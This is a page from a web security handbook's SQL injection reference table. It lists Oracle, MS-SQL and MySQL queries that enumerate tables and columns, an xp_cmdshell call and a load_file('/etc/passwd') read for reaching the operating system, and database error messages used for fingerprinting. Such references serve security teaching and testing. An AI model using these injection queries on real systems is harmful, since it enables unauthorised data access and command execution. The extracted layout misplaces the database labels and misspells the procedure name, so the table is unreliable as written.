the-web-application-hackers-handbook

334 Chapter 9 n Attacking Data Stores
(continued)
Requirement:
Oracle:
Show user tables
SELECT object_name, object_type FROM user_objects
WHERE object_type=’TABLE’
Or to show all tables to which the user has access:
SELECT table_name FROM all_tables
MS-SQL:
MySQL:
SELECT name FROM sysobjects WHERE xtype=’U’
SELECT table_name FROM information_schema.
tables where table_type=’BASE TABLE’ and
table_schema!=’mysql’
Requirement:
Oracle:
Show column names for table foo
SELECT column_name, name FROM user_tab_columns
WHERE table_name = ‘FOO’
Use the ALL_tab_columns table if the target data is not owned
by the current application user.
MS-SQL:
MySQL:
SELECT column_name FROM information_schema.columns
WHERE table_name=’foo’
SELECT column_name FROM information_schema.columns
WHERE table_name=’foo’
Requirement: Interact with the operating system (simplest ways)
Oracle: See The Oracle Hacker’s Handbook by David Litchfield
MS-SQL: EXEC xp_cmshell ‘dir c:\ ‘
MySQL: SELECT load_file(‘/etc/passwd’)
SQL Error Messages
Oracle: ORA-01756: quoted string not properly terminated
ORA-00933: SQL command not properly ended
MS-SQL: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near ‘foo’
Msg 105, Level 15, State 1, Line 1
Unclosed quotation mark before the character string
‘foo’